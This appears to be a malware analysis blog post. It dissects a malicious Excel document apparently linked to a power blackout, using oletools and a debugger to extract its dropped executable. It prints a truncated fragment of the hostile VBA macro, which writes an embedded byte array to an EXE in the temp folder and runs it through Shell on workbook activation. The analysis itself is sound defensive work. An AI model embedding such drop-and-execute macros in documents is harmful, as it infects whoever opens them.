It is not clear yet the full intrusion chain and how the malware was related to the blackout.
(See RobertMLee twitter https://twitter.com/RobertMLee/status/685030648587812864 https://twitter.com/RobertMLee/status/685031160901074944)
However, it looks like there was an MS Office XLS document involved or it was somehow related.
I got a sample of the file, and In order to perform the analysis, I followed up similar approach to this post I did some days ago:
Using Remnux v6, check the content of the file with oletools:
I dump the macro to a temporal file:
There are several encoded subroutines, but the important part for me, in order to get the EXE is the final part of the code. I can see a executable file is created and then this file is executed through the instruction 'shell'
Private Sub MacroExpl()
Dim fnum As Integer
Dim fname As String
Dim i As Integer
Dim j As Integer
Dim aa As Byte
fnum = FreeFile
fname = Environ("TMP") & "\vba_macro.exe"
Open fname For Binary As #fnum
For i = 1 To 768
For j = 0 To 127
aa = a(i)(j)
Put #fnum, , aa
rss = Shell(fname, 1)
Private Sub Workbook_Activate()
Next step is to dump the exe file. For that I will try first to open the original malicious XLS with the MS office debugger in order to put a breakpoint in that function, before it is executed.
However, the macro is password protected:
But as I have the macro already dumped in Remnux, I can create my own XLS document and import that Macro. So I do that:
Now I setup the breakpoint in the 'Shell' command and I can see where the executable file is stored before it is executed
With this I have the executable :)
In future posts I will explain a bit the approach to analyse the EXE file.